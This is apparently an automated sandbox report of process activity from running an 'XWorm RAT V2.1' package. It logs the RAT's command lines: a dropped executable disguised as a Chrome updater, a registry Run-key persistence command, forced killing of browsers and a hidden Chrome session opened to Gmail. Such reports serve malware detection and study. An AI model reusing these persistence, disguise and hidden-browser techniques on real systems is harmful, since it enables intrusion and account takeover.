C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵PID:3648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:2764
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:12⤵PID:3472
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:12⤵PID:2004
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:12⤵PID:2300
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:12⤵PID:3592
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3064 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3792 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:12⤵PID:2108
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:12⤵PID:3032
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:12⤵PID:2724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:5004
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:12⤵PID:3088
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5868 /prefetch:82⤵PID:2320
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3332 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4204 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:12⤵PID:2740
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:2764
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:12⤵PID:2480
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:12⤵PID:3292
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2976 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2452 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4620 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4476
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2448
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1836
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:896
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- NTFS ADS
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat3⤵PID:900
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1908"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:896 -
C:\Windows\system32\find.exefind ":"4⤵PID:3272
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:4876 -
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3016 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f5⤵PID:1104
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:2596
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2392
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- NTFS ADS
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2132 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat3⤵PID:1168
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2132"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3572 -
C:\Windows\system32\find.exefind ":"4⤵PID:2276
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:2384 -
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3156 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5320 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f697784⤵PID:5372
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1556 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:24⤵PID:4348
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:3020
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:5152
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3216 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:14⤵PID:5128
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:14⤵PID:2108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4560 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:14⤵PID:5676
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:5900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:5704
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:2760
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:4600
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5176 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:84⤵PID:2376
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1564 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:14⤵PID:2916
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC52⤵PID:2952
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /F /IM brave.exe3⤵PID:5676
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5876 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /F /IM chrome.exe3⤵PID:5684
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5908 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /F /IM msedge.exe3⤵PID:5700
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5896 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /F /IM firefox.exe3⤵PID:5708
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5888 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /F /IM opera.exe3⤵PID:5716
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5928 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" " https://mail.google.com" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio3⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of SendNotifyMessage
PID:3268 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f697784⤵PID:3028
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1720 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:24⤵PID:2132
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1920 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:84⤵PID:4476
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1984 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:84⤵PID:5112
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --first-renderer-process --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2672 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:14⤵PID:5708
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2700 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:14⤵PID:6136
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4080 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:14⤵PID:5788
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4200 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:84⤵PID:5156
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4244 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:84⤵PID:2896
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4588 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:84⤵PID:440
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4600 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:84⤵PID:728
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4616 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:84⤵PID:1196
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4076
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6096
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:444
-
